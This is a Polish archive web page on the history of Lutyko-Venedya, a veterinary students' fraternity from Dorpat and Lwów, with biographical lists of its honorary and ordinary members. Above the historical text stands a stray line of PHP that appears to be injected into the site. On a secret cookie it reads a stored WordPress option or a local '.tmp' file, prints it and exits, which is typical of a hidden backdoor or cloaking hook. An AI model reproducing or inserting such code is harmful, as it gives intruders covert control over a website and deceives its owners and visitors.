if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lutyko-Venedya

Dekiel Bolesława Brauera
Nazwa:
Korporacja Studentów Akademii Medycyny Weterynaryjnej Lutyko-Venedya
Siedziba:
Dorpat, od 1921 r. Lwów
Data powstania:
14 X 1884 r. (data powstania Lutycji)
Barwy:
błękitna – czerwona – ciemnosrebrna
Dewiza:
„Braterstwem i pracą”

Rys historyczny

Od góry: banda komersowa Bolesława Brauera, filisterska Konrada Millaka oraz rycerska Bolesława Brauera.

Lutyko-Venedya była najstarszą i największą korporacją we Lwowie, a jedną z najstarszych i największych w Polsce. Powstała z połączenia dorpackich korporacji Lutycyi i Venedyi na zjeździe lekarzy weterynarii w Poznaniu w lipcu 1921 r.

Komers 40-lecia Lutyko-Venedyi, Lwów 7 XII 1924 r.

Z tych korporacji starsza była utworzona dnia 14 X 1884 r. Lutycja, której grupa członków ze względu na istniejące różnice poglądów politycznych założyła dnia 4 II 1907 r. Venedyę. Obie korporacje miały charakter ściśle zawodowy. Ich członkowie byli studentami dorpackiego Instytutu Weterynaryjnego. Taki charakter korporacji został utrzymany po ich połączeniu we Lwowie, gdyż mogli do niej należeć wyłącznie słuchacze weterynarii studiujący na Akademii Medycyny Weterynaryjnej. Na mocy umowy z 1921 r. Lutyko-Venedya przyjęła datę starszeństwa Lutycji (1884 r.), barwy Venedyi (niebiesko-amarantowo-srebrne), a jej członkami stali się dotychczasowi członkowie Lutycji i Venedyi.

Obrzęd sztychowania na Komersie 45-lecia Lutyko-Venedyi, Lwów 24 (?) XI 1929 r.

Od 1921 r. Lutyko-Venedya należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 14 X 1884 r.). Była organizatorem Lwowskiego Koła Międzykorporacyjnego oraz sprawowała opiekę nad nowopowstającymi korporacjami lwowskimi: Leopolią, Zniczem, Gasconią, Scytią, Aquitanią oraz Belloną. Lutyko-Vendya posiadała rozbudowane struktury związku filistrów. Koła Filistrów działały w Warszawie, na Pomorzu, w Poznańskim oraz w Zagłębiu Dąbrowskim.

Akademia z okazji rocznicy 50-lecia Lutyko-Vendyi, zebranych wita prezes Wilhelm Sarrazin, Lwów 1934 r.

Na tle różnic politycznych doszło w Lutyko-Venedyi w 1935 r. do podziału i grupa sześciu jej członków odnowiła z inspiracji jednego z założycieli dorpackiej Lutycyi dra Jana Szukszty Lutycyę. W zaistniałym sporze Lwowskie Koło Międzykorporacyjne stanęło po stronie Lutycji, co doprowadziło do wystąpienia Lutyko-Venedyi z Koła i Związku Polskich Korporacji Akademickich. Mimo podejmowanych prób na XII i XIII Zjeździe do wybuchu wojny sytuacja nie uległa zmianie, a Lutyko-Venedya pozostawała poza strukturami Związku.

Kartele zawarła w 1921 r. z K! Lechia z Poznania, w 1929 r. z K! Lechicja z Warszawy.

Całkowita ustalona, niekompletna imienna lista członków Lutycyi, Venedyi i Lutyko-Venedyi obejmuje 552 nazwisk, w tym 25 członków honorowych.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Lutycyi, Venedyi i Lutyko-Venedyi obejmuje ponad 530 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Antoni Bant, 1930 r.

 1. Antoni J. Bant, (1891 we Lwowie - 1981) dr med. UJK 1920, habilitacja AMW 1924, prof. nadzw. 1925, kierownik Katedry Anatomii Porównawczej AMW, prof. zw. 1936, Filister honorowy Lutyko-Venedyi, po wojnie organizator i dziekan Wydziału Medycyny Weterynaryjnej we Wrocławiu, kierownik Zakładu Anatomii Porównawczej Zwierząt Domowych, dr honoris causa Wyższej Szkoły Rolniczej we Wrocławiu 1970

 2. Piotr Boczkowski, 29 czerwca 1855 w Nowoszycach w pow. kobryńskim - 21 września 1924 w Warszawie) s. Ludwika i Julii z Romanowskich, absolwent Gimnazjum w Lublinie, student i absolwent cum eximia laude Oddziału Weterynaryjnego Akademii Medyko-Chirurgicznej w Petersburgu 1874-78, po studiach do 1907 lekarz wet. w wojsku carskim, po przejściu na emeryturę uzupełniał wiedzę w zakresie bakteriologii, anatomii, fizjologii i patologii ryb w Dorpacie, wykładowca chorób ryb na kursach dla weterynarzy organizowanych w pracowni Weterynaryjnej Ministerstwa Spraw Wewnętrznych w Petersburgu 1909-12, od 1911 wykładowca higieny zwierząt i weterynarii na Kursach Przemysłowo-Rolniczych w Warszawie oraz rybactwa na oddziale agronomicznym Szkoły Rontalera, autor ok. 50 prac z zakresu weterynarii, działacz weterynaryjny, twórca, sekretarz i prezes Warszawskiego Towarzystwa Weterynarskiego, inicjator powołania uniwersyteckich studiów weterynaryjnych w Warszawie, dr honoris causa AMW 1919, pochowany na warszawskich Powązkach, odznaczony Krzyżem Komandorskim OOP, od 1913 Filister honorowy Venedyi
 3. Piotr Bohuszewicz, od 1907 Filister honorowy Venedyi
 4. Kazimierz Chełmicki, od 1912 Filister honorowy Venedyi
 5. Stanisław Dawid, (22 marca 1861 w Lublinie - 1917 w Rosji) absolwent Gimnazjum w Lublinie 1880, student i absolwent przyrodoznawstwa UW 1885, uzyskał złoty medal za pracę: “Systematyczny zarys mchów okolic Warszawy” 1884, absolwent studiów agronomicznych w Akademii Rolniczej Piotrkowsko-Razumowskiej pod Moskwą, asystent przyrodoznawstwa i agronomii tej uczelni, wykładowca botaniki, mineralogii, łąkoznawstwa, agronomii i hodowli zwierząt w Instytucie Weterynaryjnym w Dorpacie, od 1912 Filister honorowy Venedyi w Dorpacie, w czasie wojny ewakuowany z Instytutem w głąb Rosji, zmarł na tyfus
 6. Wincenty Deynis, ksiądz, od 1912 Filister honorowy Venedyi
 7. Stanisław Fijałkowski, (1893-1951) student i absolwent 1920 AMW, dr wet., w 1931 lekarz powiatowy w Kościanie, Filister honorowy Lutyko-Venedyi
 8. Kazimierz Fleszyński, (22 listopada 1879 - ) mjr lek. wet. WP, od 1907 Filister honorowy Venedyi
 9. Stefan Gajewski, (1877 - 12 grudnia 1941) prof. AMW, kierownik Zakładu Patologii i Terapii Szczegółowej Chorób Chirurgicznych 1925, od 1923 Filister honorowy Lutyko-Venedyi, w 1939 kurator Lutyko-Venedyi, zmarł w więzieniu Gestapo
 10. Adam Gerstman, (1873 - 1940 we Lwowie) s. Teofila i Anastazji z d. Szwedzicka, stryj Stanisława (Slavia), ksiądz katolicki, jezuita, dr teologii, duszpasterz akademicki, prof. zw. ULw. 1910, kierownik Zakładu Teologii Moralnej Szczegółowej UJK, dziekan Wydziału Teologicznego 1912/13, 1914/15, 1915/16 i 1916/17 oraz 1929/30 oraz rektor UJK 1928/29 i 1932/33, Filister honorowy Lutyko-Venedyi, Gasconii, Obotritii (od marca 1928) oraz Lwowskiego Koła Międzykorporacyjnego, kurator Związku Akademików Niemieckich we Lwowie, w czasie okupacji sowieckiej ukrywał się we Lwowie, zmarł w skutek braku opieki lekarskiej i trudnych warunków okupacyjnych, pochowany w grobowcu rodzinnym na Cmentarzu Łyczakowskim
 11. Bolesław Hryniewiecki, (20 lutego 1875 w Międzyrzecu Podlaskim - 13 lutego 1963 w Brwinowie k. Warszawy), botanik i zasłużony działacz ochrony przyrody, wykładowca UD 1904-14, prof. Uniwersytetu w Odessie 1914-19, prof. UW 1920-60, członek PAU 1921 i PAN 1952, od 1913 Filister honorowy Venedyi, pochowany w Warszawie
 12. Aleksander Kijewski, od 1912 Filister honorowy Venedyi
 13. Piotr Kotarski, ksiądz, od 1913 Filister honorowy Venedyi
 14. Maksymilian Hieronim Kowalewski, (1 maja 1879 w Surwiłłach - 1940 w Charkowie) s. Tomasza, student i absolwent 1907 Instytutu Weterynaryjnego w Dorpacie, Filister honorowy Lutyko-Venedyi, oficer zawodowy, płk lek. wet., w 1937 szef weterynarii w O.K. VII, pośmiertnie mianowany w 2007 gen. brygady, uczestnik wojny obronnej 1939, w niewoli sowieckiej, zamordowany przez NKWD
 15. Stanisław Królikowski, (1853-1924) herbu Poraj, s. Franciszka i Julii z Kałużyńskich, prof. i rektor 1913 AMW, od 1923 Filister honorowy Lutyko-Venedyi

  Włodzimierz Kulczycki, 1930 r.

 16. Włodzimierz Kulczycki, (1862-1936) s. Michała, dpl. Lwów 1887, zoolog, prof. anatomii i rektor AMW, twórca kolekcji kobierców i tkanin wschodnich, od 1923 Filister honorowy Lutyko-Venedyi

  Zygmunt Markowski, 1930 r.

 17. Zygmunt Markowski, (1872-1951) s. Antoniego i Anieli z d. Szczurek, student i absolwent 1895 AMW, prof. i rektor AMW, w 1931 dyrektor departamentu w Ministerstwie Rolnictwa, od 1923 Filister honorowy Lutyko-Venedyi

 18. Wacław Damian Moraczewski, (27 listopada 1867 w Warszawie - 13 września 1950 we Lwowie) lekarz, chemik, prof. chemii i nauki o żywieniu 1921-29, prof. chemii fizjologicznej i patologii ogólnej 1929-33 oraz rektor 1925-27 AMW, od 1923 Filister honorowy Lutyko-Venedyi, po wojnie prof. chemii fizjologicznej i patologii ogólnej Instytutu Weterynaryjnego we Lwowie 1945-50, od 1938 członek korespondent PAU 1938

  Stanisław Niemczycki, 1924 r.

 19. Stanisław Niemczycki, (1872 - 12 maja 1943 we Lwowie) prof. i rektor AMW, od 1923 Filister honorowy Lutyko-Venedyi, zmarł na atak serca skutek ciężkich przeżyć okupacyjnych

 20. Stefan Piotrowski, (27 kwietnia 1881 w Dziekanowicach k. Gniezna - marzec 1941 Plötzensee) s. Franciszka i Antoniny z d. Quanz, uczeń Gimnazjum w Gnieźnie, usunięty z Gimnazjum za udział w tajnej samokształceniowej organizacji im. Tomasza Zana, student wet. w Giessen w Hesji, dpl. Monachium 1906, od 1907 lekarz wet. w Dolsku pod Śremem, w czasie I wojny światowej w armii niemieckiej w randze kapitana, uczestnik powstania wielkopolskiego, żołnierz WP 1919-20 w randze rotmistrza, dr wet. AMW 1925, działacz społeczny i polityczny, współzałożyciel, członek Zarządu Głównego oraz prezes oddziału poznańskiego Zrzeszenia Lekarzy Weterynarii RP, członek Państwowej Rady Weterynaryjnej przy Ministrze Rolnictwa i Reform Rolnych 1934-39, organizator zbiórki funduszy na budowę domu studenckiego AMW we Lwowie, Filister honorowy Lutyko-Venedyi, prezes Stronnictwa Narodowego na powiat poznański, radny m. Poznania, po wybuchu wojny inicjator powołania konspiracyjnego Zarządu Okręgowego SN (”Narodowa Organizacja Bojowa”), zastępca Delegata Rządu na Ziemie Zachodnie, aresztowany przez Niemców i więziony w Forcie VII, we Wronkach, Zgorzelcu oraz w Berlinie, skazany na karę śmierci i ścięty toporem w więzieniu w Plötzensee pod Berlinem
 21. Roman Potocki, Filister honorowy warszawskiej Lechicji i lwowskiej Lutyko-Venedyi
 22. Bronisław Raczkowski, od 1907 Filister honorowy Venedyi
 23. Stefan Rössler (Roesler), (19 sierpnia 1885 - ) student i absolwent 1909 Szkoły Weterynaryjnej we Lwowie, od 1912 Filister honorowy Venedyi w Dorpacie 1912, kpt. lek. wet., w latach 30. lekarz powiatowy w Szamotułach
 24. Stanisław Runge, (3 maja 1888 - 1953) s. Ludwika i Natalii z Politalskich, student i absolwent 1913 Szkoły Weterynaryjnej we Lwowie, mjr rez., prof. i rektor 1933-36 UP, sanacyjny działacz polityczny, Filister honorowy lwowskiej Lutyko-Venedyi oraz poznańskiej Palestrii, w czasie wojny w Wielkiej Brytanii, w 1946 wrócił do kraju, jeden z budynków Uniwersytetu Przyrodniczego na poznańskim Sołaczu nosi nazwę Kolegium Rungego, w 2003 na fasadzie kamienicy przy ul. Libelta 24, gdzie mieszkał, umieszczono tablicę pamiątkową ku jego czci
 25. Józef Ksawery Wierzbicki, (1904 we Lwowie - 22 lutego 1942(41?) we Lwowie) student Wydziału Filozoficznego UJK, założyciel Znicza, akt. 1924-27, wiceprezes sem. let. 1924/25, mgr praw i absolwent WSHZ, bankowiec, wiceprezes Związku Bankowców, Filister honorowy Lutyko-Venedyi

Członkowie rzeczywiści

 1. Czesław Adamowicz, (1885 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, w 1931 lekarz sejmikowy w Słomnikach pow. Miechów
 2. Konstanty Ankowski,
 3. Wacław Antoszewski, c. 1897 Lutycja
 4. Stefan Artymowski, c. 1925
 5. Romuald Bacz, (1907 - 1980 w Ostrowie Wielkopolskim) akt. 1928-33, pochowany na nowym cmentarzu w Ostrowie Wielkopolskim
 6. Zygmunt Bagieński, c. II sem. 1907 Venedya
 7. Stanisław Bakun, (1875 - ) student i absolwent 1901 Instytutu Weterynaryjnego w Dorpacie, c. 1895 Lutycja, w 1931 lekarz sejmikowy w Gostyninie
 8. Stanisław Banach, akt. 1925-27
 9. Tadeusz Banach, c. 1926/27
 10. Mieczysław Baranowicz, (1872 - 1939 w Piotrkowie Trybunalskim) student i absolwent 1895 Instytutu Weterynaryjnego w Dorpacie, c. 1891 Lutycja, w 1931 lekarz miejski w Piotrkowie, pochowany w Piotrkowie Trybunalskim
 11. Jan Barkłowski, Lutycja
 12. Romuald Batsch, akt. 1926-27

  Wacław Bartoszewski, ok. 1910 r.

 13. Wacław Bartoszewski, (1883 w Surhowie - 26 lutego 1943 w Józefowie) s. Stanisława i Marii Teodory z Pałczyńskich, student Instytutu Weterynaryjnego w Warszawie, relegowany ze studiów pracował jako nauczyciel w Żółkiewce, student i absolwent Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, po studiach m.in. pracownik “rzeźni angielskiej” w Motyczu k. Lublina, w czasie I wojny światowej zmobilizowany do armii carskiej, w czasie II wojny światowej rozstrzelany przez Niemców na rynku w Józefowie wraz żoną i córką, pochowany w kwaterze partyzanckiej w Józefowie

 14. Juliusz Baumung (Baumunk), ( - wrzesień 1939) akt. 1938-39, lekarz wet., pchor. zmobilizowany do pułku jazdy, zginął na polu chwały

  Alojzy Bąk, 1928 r.

 15. Alojzy Tadeusz Bąk, (22 grudnia 1897 w Kobylejgórze w pow. ostrzeszowskim - 1940 w Charkowie) s. Augustyna i Marii z Czekanów, absolwent Gimnazjum w Kępnie, żołnierz armii niemieckiej 1916-18, uczestnik powstania wielkopolskiego i wojny polsko-rosyjskiej 1920, mianowany podporucznikiem 1919, student i absolwent 1929 AMW, członek Venedyi, potem Lutyko-Venedyi, wiceprezes Bratniej Pomocy Studentów AMW 1922, Filister honorowy (?) Lechicji 1938, w 1938 prezes (Warszawskiego ?) Koła Filistrów, dr wet., oficer zawodowy, mjr WP, w 1939 kierownik Centrum Wyszkolenia i Badań Weterynaryjnych, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD, odznaczony m.in. za wojnę 1920 Virtuti Militari, dwukrotnie Krzyżem Walecznych

 16. Roman Ludwik Bednarczyk, (1907 w Grodzisku Wlkp. - 1960) student i absolwent 1936 AMW, c. ok. 1930, akt. 1930-36
 17. Felicjan Bernacki, (1904 - 1939) student i absolwent 1932 AMW, c. 1926/27, sekretarz Bratniej Pomocy Studentów AMW 1928, w 1931 lekarz wet. w Skarszewach, por. rez., uczestnik wojny obronnej 1939, po zwolnieniu z niewoli niemieckiej mieszkał wraz z rodziną w Pelplinie, uwięziony 31 października 1939 w Skarszewach, 4 listopada 1939 wywieziony w kierunku Starogardu, brak informacji o dalszych losach, prawdopodobnie zamordowany przez Niemców
 18. Leon Bezuhły, (1872 - ) (1872 - ) student i absolwent 1897 Instytutu Weterynaryjnego w Dorpacie, c. 1892 Lutycja, w 1931 lekarz powiatowy w Przasnyszu, pochowany na Cmentarzu w Ciechanowie
 19. Bolesław (Stanisław ?) Białobrzeski, (1874 - ) student i absolwent 1897 Instytutu Weterynaryjnego w Dorpacie, c. 1893 Lutycja, w 1931 lekarz powiatowy w Wielejce
 20. Bekir Biciutko, (1872 - ) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1892 Lutycja, w 1931 lekarz miejski w Białymstoku
 21. Apoloniusz Biederman, c. 1926/27
 22. Mieczysław Bielakowski, c. 1897 Lutycja

  Jan Bielecki, 1931 r. (?)

 23. Jan Bielecki, ( - 1938 w Ostrowcu Świętokrzyskim) akt. 1925-31, prezes 1929, prezes Lwowskiego Koła Międzykorporacyjnego 1928/29, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, napisał “Z dziejów PK!A Lutyko-Venedya” (Wiadomości Korporacyjne 1927, nr 2, s. 44-47 oraz 1928, nr 4, s. 90-93)

 24. Jan Bielicki, (?)
 25. Jan Bielkiewicz, c. 1894 Lutycja
 26. Józef Blecharczyk, student AMW, akt. 1938-39
 27. Marian Błaszczyk, akt. 1931
 28. Wacław Bobiński, (1884 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz powiatowy w Wysokie Mazowieckie
 29. Zygmunt Bogusławski, (1897 - ) student i absolwent 1928 AMW, c. 1925, w 1931 lekarz sejmikowy w Piotrkowie albo dyrektor rzeźni w Kruszwicy
 30. N. Boguszewski, student UD, c. 1916 Venedya (stały gość)
 31. Włodzimierz Bondini, c. I sem. 1909 Venedya
 32. Stefan Boniecki, (1883-1959) student i absolwent Instytutu Weterynaryjnego w Dorpacie 1907-13, Venedya, mjr WP, w 1931 na emeryturze

  Alfons Boretti, 1927-1939.

 33. Alfons Boretti, (14 maja 1882 w Mińsku na Białorusi - 9 lutego 1952 w Radomiu) s. Wincentego i Anastazji z Tworskowskich, student i absolwent Instytutu Weterynaryjnego w Dorpacie, c. I sem. 1912 Venedya, zmobilizowany w I wojnie światowej, po wojnie lekarz w Miechowie, a od 1927 lekarz powiatowy w Radomiu, pochowany w grobowcu rodzinnym na Cmentarzu w Radomiu-Borkach

 34. Bolesław Borkowski, akt. 1932-39, asystent prof. Zakrzewskiego
 35. Walens Bortkiewicz, c. 1897 Lutycja

  Marian Bratkowski

 36. Marian Bratkowski, (19 listopada 1907 w Brześciu Kujawskim - 12 grudnia 1977 w Bydgoszczy) s. Jana i Florentyny z d. Zaremba, absolwent Gimnazjum im. Jana Kasprowicza w Inowrocławiu 1927, student 1927-32 i absolwent 1935 AMW, akt. 1931, po studiach miejski lekarz wet. W Rzeźni Miejskiej w Bydgoszczy 1935-39, wzięty do niewoli niemieckiej w wojnie obronnej 1939, więzień Oflagu VII w Murnau, po wojnie do 1971 lekarz wet. w Rzeźni Miejskiej w Bydgoszczy, pochowany na Cmnetarzu przy ul. S. Wyszyńskiego w Bydgoszczy

  Bolesław Brauer, 1931 r.

 37. Bolesław Brauer, (21 lipca 1906 w Mogilnie - 23 czerwca 1989 w Bydgoszczy) s. Władysława i Pelagii z d. Dobrzykowska, absolwent Klasycznego Gimnazjum im. Jana Kasprowiczu w Inowrocławiu 1927, student i absolwent 1934 AMW, akt. 1927-34, prezes sem. let. 1930/31, sem. zim. 1931/32 i 1932/33, po studiach kierownik Rzeźni Miejskiej 1934-35, miejski lekarz wet. oraz wicedyrektor Rzeźni i Targowisk Miejskich w Bydgoszczy 1935-39, jednocześnie kontynuował pracę naukową w Instytucie Weterynarii w Bydgoszczy oraz AMW 1935-39, dr wet. 1939, w wojnie obronnej 1939 jako lekarz wet. w 8 Pułku Artylerii Ciężkiej oraz 88 Dywizjonie Artylerii Cieżkiej, m.in. w obronie Warszawy, więzień niemieckich obozów jenieckich 1939-45, po wojnie dyrektor Rzeźni i Targowisk Miejskich w Bydgoszczy 1947-50, naczelny lekarz wet. i kierownik Weterynaryjnego Inspektoratu Sanitarnego w Zakładach Mięsnych 1950-73, inspektor w Weterynaryjnym Inspektoracie Sanitarnym oraz Bazie Żywca przy Zakładach Mięsnych w Bydgoszczy 1973-81, pochowany na Cmentarzu przy ul. Wyszyńskiego w Bydgoszczy, wyróżniony odznaczeniem ministra rolnictwa za wzorcową pracę w służbie weterynaryjnej

 38. Stefan Bross, (1897 w Witkowie - lipiec 1945) s. Konstantego i Heleny z Knastów, brat Mariana (Baltia) i Wiktora (Masovia), powstaniec wielkopolski, obrońca Lwowa, student i absolwent AMW, członek Venedyi, potem Lutyko-Venedyi, prezes 1921/22, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1924/25, żołnierz wojny obronnej 1939, więziony w Stutthofie, z powodu ciężkiej choroby zwolniony, pochowany w Śliwicach k. Starogardu
 39. Szczęsny Brzostowski, c. 1914-18 Venedya [prawd. Szczęsny Karol Brzostowski (3 stycznia 1895 - 1920) herbu Strzemię, s. Mariana i Marii z Żyżniewskich, brat Władysława (Welecja)]
 40. Florian Brzozowski, założyciel Lutycji 1884
 41. Mieczysław Budkiewicz, c. 1886 Lutycja
 42. Jerzy Budweil, ( - lata 60-te w Słubicach ?) student AMW, c. ok. 1931 Lutyko-Venedya, akt. 1931-35, miał należeć do tajnej organizacji SN, na której zlecenie dokonał w 1935 wraz z grupą kolegów rozłamu w Lutyko-Vendyi i odnowił Lutycję, akt. 1935-37 Lutycja, prezes Lwowskiego Koła Międzykorporacyjnego 1935/36, wiceprezes Bratniej Pomocy Studentów AMW 1936, napisał referat “Problemy wychowania korporacyjnego” (Podręcznik oldermana, Lwów 1936)
 43. Gustaw Budzyński, (1882 - ) student i absolwent 1918 AMW, c. 1907 Lutycja, w 1931 lekarz grodzki w Warszawie
 44. Jan Budzyński, (1908 w Czarnkowie - ) student i absolwent 1935 AMW, c. 1926/27, akt. 1926/27-35
 45. Bolesław Bujalski, c. 1887 Lutycja
 46. Konstanty Bukowski, ( - zm. w Brodnicy) akt. 1932-39
 47. Józef Buszkiewicz, (1914 - 1982 w Gorzowie) student AMW, akt. 1938-39, sekretarz 1938, sekretarz sem. let. 1938/39 (po Egonie Saphierze), po wojnie student i absolwent 1947 wet. AR Wrocław, pracownik Gorzowskich Zakładów Przemysłu Bioweterynaryjnego
 48. Józef Butkiewicz, (1880 - ) c. 1903 Lutycja, założyciel Venedyi
 49. Ignacy Bzura, c. 1889 Lutycja
 50. Stanisław Cegielski, c. 1925
 51. Stefan Chazbijewicz, (1863 - 1944) student i absolwent 1890 Instytutu Weterynaryjnego w Dorpacie, c. 1886 Lutycja, w 1931 lekarz sejmikowy w Nowogródku, miał zginąć podczas Powstania Wileńskiego
 52. Witold Chełmicki, (1884-1937) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, założyciel Venedyi, w 1931 lekarz powiatowy w Kosowie pow. Kosów
 53. Bronisław Chodorowski, (1/14 grudnia 1896 w Knyszynie Białostockim - 1940 w Katyniu) s. Wincentego i Stefanii z Citkowskich, uczestnik wojny 1919-21, student i absolwent 1922 AMW, członek Venedyi, potem Lutyko-Venedyi, w 1931 lekarz powiatowy w Święcianach, ppor. rez. Okręgu Korpusu III, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Krzyżem Walecznych
 54. Karol Chudzyński, c. 1892 Lutycja
 55. Jan Chwalibóg, (1906-1984) akt. 1926-27

  Wacaław Chybowski, Dorpat.

 56. Wacław Chybowski, (1885 w Sierakówka pow. Gostynin - 26 października 1959 w Puławach) od 1904 student Instytutu Weterynaryjnego w Warszawie, student i absolwent 1905-09 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, założyciel Venedyi, początkowo pracował jako lekarz weterynarii w Janowie Podlaskim i Sokołowie Podlaskich, w czasie pierwszej wojny lekarz wojskowy na różnych frontach, w 1921 wrócił do kraju, lekarz weterynarii w Puławach i Lublinie, w 1931 lekarz powiatowy w Puławach, pochowany na cmentarzu parafialnym w Puławach

 57. Józef Cieszkowski, (1868 - ) s. Juliana, student i absolwent 1892 Instytutu Weterynaryjnego w Dorpacie, c. 1888 Lutycja, w 1931 lekarz miejski w Brzezinach pow. Brzeziny
 58. Stanisław Cieślewski, (1884 - ) student i absolwent 1905 Instytutu Weterynaryjnego w Dorpacie, c. 1900 Lutycja, w 1931 lekarz powiatowy w Płońsku
 59. Stefan Colbe, c. II sem. 1910 Venedya
 60. Kazimierz Cytlak, (1904 w Tarnowie - 3 marca 1964 w Rybniku) s. Jozefa i Emilii z d. Bonikowska, student i absolwent 1935 AMW, c. 1926/27, uczestnik wojny obronnej 1939, w niewoli niemieckiej, zwolniony, w czasie wojny i po 1945 w Pszczynie

  Tadeusz Czabajski, 1931 r.

 61. Tadeusz Czabajski, (1908 w Raszkowie (Podole) - 1994) kuzyn Mariana (Posnania), student i absolwent 1934 AMW, c. 1926/27, akt. 1926/27-31, II wiceprezes sem. let. 1930/31, po studiach lekarz wet. w Raszkowie w pow. ostrowskim

 62. Bogdan (Nałęcz-)Czarnecki, (13 czerwca 1883 w Lublinie - 30 stycznia 1958 w Kraśniku) s. Alfonsa Wojciecha i Władysławy de Michelis, teść Włodzimierza Głogowskiego (Patria), student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, od 1908 w Venedyi, od 1921 filister LV, po studiach odbył staż weterynaryjny w Batumi, Adżikambuł, Lenkoran, Acmara, Postoszka, lekarz weterynarii WP 1919-20, uczestnik wojny polsko-bolszewickiej 1920 jako rotmistrz ordynator dyw. Szp. Koni, po wojnie lekarz weterynarii w Hrubieszowie i Krasnystawie, a od 1943 w Kraśniku, pochowany na Cmentarzu w Kraśniku

  Bolesław Czarnocki, po 1945 r.

 63. Bolesław Czarnocki, (19 grudnia 1876 - 16 lipca 1964 w Szczecinie) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1897 Lutycja, w 1931 lekarz powiatowy w Równem, po wojnie emerytury w Wydziale Weterynaryjnym Urzędu Miejskiego w Szczecinie, pochowany na Cmentarzu Centralnym w Szczecinie

 64. Olgierd Czarnocki, (1892 - ) student i absolwent 1915 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1911 Venedya, w 1931 lekarz miejski w Krankach pow. Grodno
 65. Witold Czarnocki, (1893 - ) student Instytutu Weterynaryjnego w Dorpaciec. 1914-18 Venedya, dpl. Nowoczerkask 1919, w 1931 pracował w Brzostownicy pow. Grodno
 66. Zygmunt Czarnocki, (1894 - ) student i absolwent 1917 Instytutu Weterynaryjnego w Dorpacie, c. 1914-18 Venedya, w 1931 lekarz powiatowy w Słupcy [być może Zygmunt Czarnocki (1895 - ) herbu Lis, s. Michała]
 67. Piotr Czechowski, c. 1891 Lutycja
 68. Bolesław Czempiński, (1878 - ) student i absolwent 1903 Instytutu Weterynaryjnego w Dorpacie, c. 1901 Lutycja, oficer zaw., płk WP
 69. Mateusz Dąbrowski, c. 1895 Lutycja
 70. Stanisław Dąbrowski, c. 1893 Lutycja
 71. Leon Demcióch (Demciuch), (14 lutego 1901 w Niesłuchowie - 6 września 1973 w Londynie) student i absolwent 1928 AMW, c. 1925, akt. 1925-27, wiceprezes 1926/27, kpt. dr wet. 1936, w 7 Pułku Strzelców Konnych 1937, w wojnie obronnej 1939 naczelny lekarz Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, walczył m.in. pod Bzurą i w walkach odwrotowych w obronie Warszawy, w niewoli niemieckiej 1939-45, pozostał na emigracji w Wielkiej Brytanii

  Henryk Dereziński, Lwów 1936/1937

 72. Henryk Dereziński, (1913 - 28 sierpnia 2008 w Zakopanym) student i absolwent 1941 AMW, c. 1937, akt. 1937-39, zasłużony dla rozwoju hodowli owczarków podhalańskich, przewodniczący Klubu Owczarków Podhalańskich, działacz Związku Kynologicznego, pochowany na Cmentarzu Zasłużonych na Pęksowym Brzysku w Zakopanem

 73. Alfons Dębski, (22 kwietnia 1906 w Radowiskach Wielkich - 4 sierpnia 1961 w Szczecinku) s. Tomasza (nauczyciela i kierownika szkoły podstawowej) i Weroniki z Wojnowskich, brat Edmunda, Józefa i Telesfora (wszyscy trzej Baltia), absolwent Gimnazjum w Chełmie, student i absolwent 1932 AMW, akt. 1926-29, olderman 1926/27, 1927/28 i 1928/29, przeszedł przeszkolenie w Szkole Podchorążych w Grudziądzu 1932-33, ppor. rez. 18 Pułku Ułanów Pomorskich z Grudziądza, lekarz obwodowy wet. w Więcborku 1933-38, lekarz powiatowy wet. w Szubinie 1938-39, członek Związku Zachodniego, w 1939 zmobilizowany jako lekarz weterynarii, w czasie okupacji z obawy przed aresztowaniem wyjechał do Warszawy w Generalnej Guberni, po wojnie lekarz powiatowy wet. w Miastku i Słupsku, ordynator Powiatowego Zarządu Lecznictwa Weterynarii Zwierząt w Szczecinku 1956-58, organizator i dyrektor Państwowego Zakładu Unasienniania Zwierząt w Szczecinku 1958-61, specjalizował się w sztucznym zapładnianiu zwierząt (inseminacji) i chorobach zakaźnych zwierząt (epizoocjologii), zmarł nagle, pochowany na cmentarzu komunalnym w Szczecinku
 74. Ksawery Dębski, c. 1891 Lutycja
 75. Antoni Długoszowski, akt. 1926-28, prezes 1926/27 i 1927/28
 76. Stefan Dobek, (1883 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, oficer zawodowy, mjr WP
 77. Tomasz Dobrowolski, (1864 - ) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1885 Lutycja, w 1931 lekarz miejski w Częstochowie
 78. Jan Dobrzański, c. 1897 Lutycja
 79. Marian Domaniewski, c. 1925
 80. Tomasz Domaszewski
 81. Czesław Dowbor, (1874 - ) student i absolwent 1894 Instytutu Weterynaryjnego w Dorpacie, c. 1894 Lutycja, w 1931 lekarz miejski w Wilnie
